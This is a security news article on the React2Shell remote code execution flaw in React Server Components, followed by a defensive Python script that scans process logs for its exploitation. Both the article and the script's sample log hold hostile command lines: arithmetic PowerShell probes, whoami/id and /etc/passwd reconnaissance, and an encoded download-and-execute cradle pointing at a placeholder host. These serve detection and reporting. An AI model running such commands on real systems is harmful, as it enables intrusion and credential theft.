React2Shell Vulnerability: 30 Orgs Breached, 77K IPs at Risk

by priyanka.patel, tech editor

React2Shell Flaw: Over 77,000 Systems Vulnerable to Critical Remote Code Execution

A critical remote code execution vulnerability, dubbed React2Shell (CVE-2025-55182), is impacting over 77,000 internet-exposed systems, with confirmed compromises already affecting more than 30 organizations across multiple sectors.

The flaw, an unauthenticated remote code execution vulnerability exploitable with a single HTTP request, affects all frameworks implementing React Server Components, including the widely used Next.js. React disclosed the vulnerability on December 3rd, attributing it to unsafe deserialization of client-controlled data within React Server Components, allowing attackers to trigger arbitrary command execution.

Developers are urged to immediately update to the latest React version, rebuild their applications, and redeploy to mitigate the risk. The rapid escalation of exploitation began on December 4th, following the publication of a working proof-of-concept by security researcher Maple3142. This quickly led to automated scanning and exploitation attempts.

Widespread Vulnerability and Initial Compromises

Shadowserver, an internet watchdog group, has identified 77,664 IP addresses currently vulnerable to the React2Shell flaw, with approximately 23,700 located in the United States. The detection method, developed by Searchlight Cyber/Assetnote, involves sending HTTP requests designed to exploit the vulnerability and verifying a specific response to confirm susceptibility.

GreyNoise has recorded 181 distinct IP addresses actively scanning for the flaw in the past 24 hours, with the majority of activity originating from the Netherlands, China, the United States, Hong Kong, and several other countries. According to reports, the scans appear largely automated.

Palo Alto Networks indicates that over 30 organizations have already been compromised, with attackers leveraging the vulnerability to execute commands, conduct reconnaissance, and attempt to steal sensitive AWS configuration and credential files. Disturbingly, some of these intrusions have been linked to Chinese state-associated threat actors.

Attack Patterns and Malware Deployment

Since the vulnerability’s disclosure, researchers have observed widespread exploitation of CVE-2025-55182. GreyNoise reports that attackers often begin with PowerShell commands that evaluate a simple arithmetic expression – such as powershell -c "40138*41979" and powershell -c "40320*43488" – to confirm that the remote code execution flaw is present while leaving minimal traces.

Once successful, attackers are deploying base64-encoded PowerShell commands to download additional scripts directly into memory. One observed instance involved a PowerShell script sourced from 23[.]235[.]188[.]3, designed to disable AMSI (Anti-Malware Scan Interface) and facilitate the deployment of further payloads.

VirusTotal analysis reveals that this script installs a Cobalt Strike beacon, providing threat actors with a persistent foothold on compromised networks. Amazon AWS threat intelligence teams have also detected rapid exploitation linked to China-affiliated Advanced Persistent Threat (APT) groups, including Earth Lamia and Jackpot Panda. These actors are performing reconnaissance using commands like whoami and id, attempting file creation, and reading system files such as /etc/passwd.

Palo Alto Networks attributes some of the observed activity to UNC5174, a Chinese state-sponsored threat actor believed to be connected to the Chinese Ministry of State Security. “Unit 42 observed threat activity we assess with high confidence is consistent with CL-STA-1015 (aka UNC5174), a group suspected to be an initial access broker with ties to the Chinese Ministry of State Security,” a Senior Manager at Palo Alto Networks Unit 42 told BleepingComputer via email. The deployed malware includes:

  • Snowlight: A malware dropper used to deploy additional payloads on breached systems.
  • Vshell: A backdoor commonly employed by Chinese hacking groups for remote access, post-exploitation activities, and lateral movement within compromised networks.

Patching Efforts and Ongoing Risks

The severity of the React flaw has prompted a global rush to implement patches and mitigations. Cloudflare recently deployed emergency detections and mitigations within its Web Application Firewall (WAF), but an initial update inadvertently caused a service outage before being corrected.

The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-55182 to its Known Exploited Vulnerabilities (KEV) catalog, mandating that federal agencies apply patches by December 26, 2025, under Binding Operational Directive 22-01.

Organizations utilizing React Server Components or frameworks built upon them are strongly advised to immediately update their systems, rebuild and redeploy applications, and meticulously review logs for any indications of PowerShell or shell command execution. The widespread exploitation and the involvement of state-sponsored actors underscore the critical need for swift and comprehensive remediation efforts.
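The article describes the probe and post-exploitation commands seen in the wild (arithmetic PowerShell probes, base64-encoded PowerShell used to pull scripts into memory, whoami/id reconnaissance, reads of /etc/passwd) and then advises reviewing logs for PowerShell or shell command execution. The following is an added example, not code from the article or from any of the vendors it cites, that turns those indicators into a small log triage script. The process-execution log format (`timestamp host parent=<proc> cmd=<command line>`), the sample lines, the encoded payload and the "shell spawned by node" heuristic are all constructed assumptions for this example; adapt the parser to whatever your EDR, auditd or sysmon export actually produces.

```python
import base64
import re
from dataclasses import dataclass

# Constructed encoded payload standing in for the in-memory download style
# the article describes; the URL is an obvious placeholder, not an IoC.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"
    .encode("utf-16-le")
).decode("ascii")

# Constructed process-execution log lines (assumed format, not from the article).
SAMPLE_LOG = f"""\
2025-12-05T10:12:33Z web01 parent=node cmd=powershell -c "40138*41979"
2025-12-05T10:12:35Z web01 parent=node cmd=powershell -c "40320*43488"
2025-12-05T10:13:01Z web01 parent=node cmd=powershell -EncodedCommand {_ENCODED}
2025-12-05T10:14:10Z web02 parent=node cmd=sh -c "whoami; id; cat /etc/passwd"
2025-12-05T10:15:00Z web02 parent=systemd cmd=/usr/bin/node server.js
2025-12-05T10:16:42Z build01 parent=bash cmd=powershell -c "Get-Date"
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+parent=(?P<parent>\S+)\s+cmd=(?P<cmd>.*)$")

# Arithmetic probe: powershell -c "NNNN*NNNN" style, as reported by GreyNoise.
ARITH_PROBE = re.compile(r'powershell(?:\.exe)?\s+(?:-c|-command)\s+"?\d+\s*\*\s*\d+"?', re.I)
# Base64 payload passed via -EncodedCommand (or its short aliases).
ENCODED_PS = re.compile(r"powershell(?:\.exe)?\s+.*?-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Reconnaissance commands as standalone tokens (avoid matching "id" inside words).
RECON = re.compile(r"""(?:^|[\s;&|"'])(whoami|id)(?=$|[\s;&|"'])""")
PASSWD = re.compile(r"/etc/passwd")
# Interpreters that a Node/Next.js server process has no business spawning (heuristic).
SHELLS = {"powershell", "powershell.exe", "pwsh", "sh", "bash", "cmd", "cmd.exe"}


@dataclass
class Finding:
    ts: str
    host: str
    parent: str
    cmd: str
    tags: list[str]


def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE); '' if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify(parent: str, cmd: str) -> list[str]:
    """Return the list of indicator tags that apply to one process launch."""
    tags: list[str] = []
    parts = cmd.split()
    exe = parts[0].replace("\\", "/").rsplit("/", 1)[-1].lower() if parts else ""
    if parent.lower() == "node" and exe in SHELLS:
        tags.append("shell-spawned-by-node")
    if ARITH_PROBE.search(cmd):
        tags.append("arith-probe")
    m = ENCODED_PS.search(cmd)
    if m:
        tags.append("encoded-powershell")
        decoded = decode_encoded_command(m.group(1)).lower()
        # Download cradle or AMSI tampering inside the decoded script body.
        if any(k in decoded for k in ("downloadstring", "invoke-expression", "iex", "amsi")):
            tags.append("download-cradle-or-amsi")
    if RECON.search(cmd):
        tags.append("recon-cmd")
    if PASSWD.search(cmd):
        tags.append("passwd-read")
    return tags


def scan_log(text: str) -> list[Finding]:
    """Parse each line and keep only launches that carry at least one indicator."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        tags = classify(m["parent"], m["cmd"])
        if tags:
            findings.append(Finding(m["ts"], m["host"], m["parent"], m["cmd"], tags))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ts} {f.host} parent={f.parent} tags={','.join(f.tags)} cmd={f.cmd[:60]}")
```

The benign lines (node started by systemd, a PowerShell command run from an interactive bash session on a build host) produce no finding, while the four lines that mirror the article's observed behaviour each get tagged; the parent-process check is the strongest single signal here, since a React Server Components process should never spawn a shell on its own.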
